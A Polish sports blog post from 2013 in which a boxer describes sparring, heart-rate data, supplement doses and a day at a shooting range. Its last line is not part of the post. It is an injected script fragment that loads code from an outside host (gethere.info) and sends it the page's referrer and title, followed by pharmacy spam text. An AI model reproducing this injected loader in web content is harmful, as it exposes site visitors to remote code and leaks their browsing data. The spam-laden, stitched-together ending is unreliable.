Ekstremalny trening,ekstremalny wypoczynek!!!!!!!

29.10.2013 / Mariusz Cieśliński

Ekstremalny trening,ekstremalny wypoczynek!!!!!!! To jest motto,które towarzyszy mi od wielu lat w przygotowaniach.Jeśli chcesz łamać bariery i wbić się na szczyt to musisz najpierw złamać swój organizm na treningu.Jakim? Takim,który najbardziej będzie przypominał warunki startowe.

W sportach walki na szczycie piramidy treningowej stoi walka sparringowa.Jeśli chodzi o zawodowców to podstawą jest bezpieczeństwo czyli dobry sprzęt ochronny. Drugim aspektem jest tempo.Jeśli masz silniejszego fizycznie partnera to super.Właśnie taki jest potrzebny.Do tego jeśli fajnie się porusza to już jest sytuacja gdzie można fajnie popracować.Jeśli realizuje założenia taktyczne mimo zmęczenia to to jest to,o co chodzi w tym sporcie.

Wrzuciłem do galerii zrzut z zapisu na pulsometrze ze sparringu-trening czas trwania zapisu 1h17min.Duże tętno-191-dzięki moim sparringpartnerom :),tempo i spalanie kcal. oraz temperatura na sali robi większe zapotrzebowanie na płyny.Vitargo Electro Energy musi być dostępne.Przed treningiem spróbowałem podwójnej dawki S.A.W.-10 gram dla mnie jest sporą dawką ale czułem się świetnie bez dyskomfortu.BCAA X TANK standardowo.

Taki monitoring i umiejętne korzystanie z gadżetów elektronicznych  jest bardzo przydatne w budowaniu struktury i indywidualizacji w treningu.Poza tym taki rodzaj mocnego wysiłku służy jako poligon do testowania i działania suplementów,które będzie się używać w dniu startu.

Dzień później miałem wolne-znajomi mnie zaprosili na strzelnicę gdzie miałem okazję pobawić się sprzętem i „zabawkami dla dużych chłopców”. :) Pełen relaks i koncentracja jednocześnie.Budowanie formy nie jest trudne.Ciężki i mocny trening połączony z wypoczynkiem :)

Na zdjęciach nie mam walk sparringowych ale zwykły trening codzienny.Praca na tarczach,skakankach ,walka z cieniem-bokserski standard.Odwiedzili nas strongman Tyberiusz Kowalczyk i medalista olimpijski Wojtek Bartnik-jego rady dotyczące treningu rąk są bardzo cenne. :)

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; Purchase Cheap Pills Order univerzitet travnik Purchase online